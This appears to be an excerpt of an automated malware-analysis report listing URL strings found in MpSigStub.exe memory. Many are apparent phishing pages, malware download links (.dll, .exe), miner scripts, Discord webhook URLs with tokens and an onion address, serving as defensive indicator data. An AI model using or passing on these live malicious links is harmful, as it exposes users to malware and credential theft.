Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://alexdepase.coach/wp-admin/Ic4ZVsh/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://alfahad.io/ocart2/admin/controller/catalog/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: https://am.localstormwatch00.localstormw$
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://antarbryansk.ru/asdf/?_truthcolor=?dramafrine
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: https://aouscchakwal.000webhostapp.com/hot.phpmethod=
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://asianbusss.ru/qazx/?activity=4789652
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://atencionpreferente.com/crm/custom/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://basilandco.co.uk/black/report-pdf.php
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://beer.appi.top/?74c96ea1gmz9qipluhdvtw6q7ekn6e0upb
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://begumprinters.com/css/absa/php/absajslogo.php?r=
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://bemojo.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2g8qrgl
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2pfj2w
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2zbes5a
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: https://bitly.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://bitprimezwb.ml/non.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://bizimi.com/aa-manage/post/ftp/themes/nazl/phpnet.php?code=2000700
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://bjhvgft67rf.gb.net/vfeg877g7/?cvwrg3g=vv3g3v4f
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://boyscoutsram.com/c2hhd2v6x2jhbnvyaubiyxquy29t
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://btchs.com.br/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://builderdoc.org/life/direct.php)
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer.bauer
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://c.top4top.io/p_1832dqk101.jpg
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://canary.discord.com/api/webhooks/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://cimax.com.tw/images/tw/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: https://cmail.daum.net/v2/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://coffreo.biz/xmlrpc.php
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://communitymanageragency.com/wp-admin/css/colors/light/report-pdf.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://consumerelectronicsonline.net/owa/2018outlook/2018outlook/outlooks
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://contirecovery.info
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://cryptopro.ga/File/apo.exe
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: https://cryptotreasurytrust.com/vnV
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/tbcyxag
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: https://cutt.ly/zhqz1t6
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://dancevida.com/css/app.css
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://dchenterprisesinc.com/wp-content/themes/report-maerskline.php
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: https://de.gsearch.com.de/api/update.sh
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: https://des4556yuhgfrt.gb.net/fde45tfttyt/?veg54g5=br4hg4v
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://diproelec.com.sv/moollll/excelzz
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
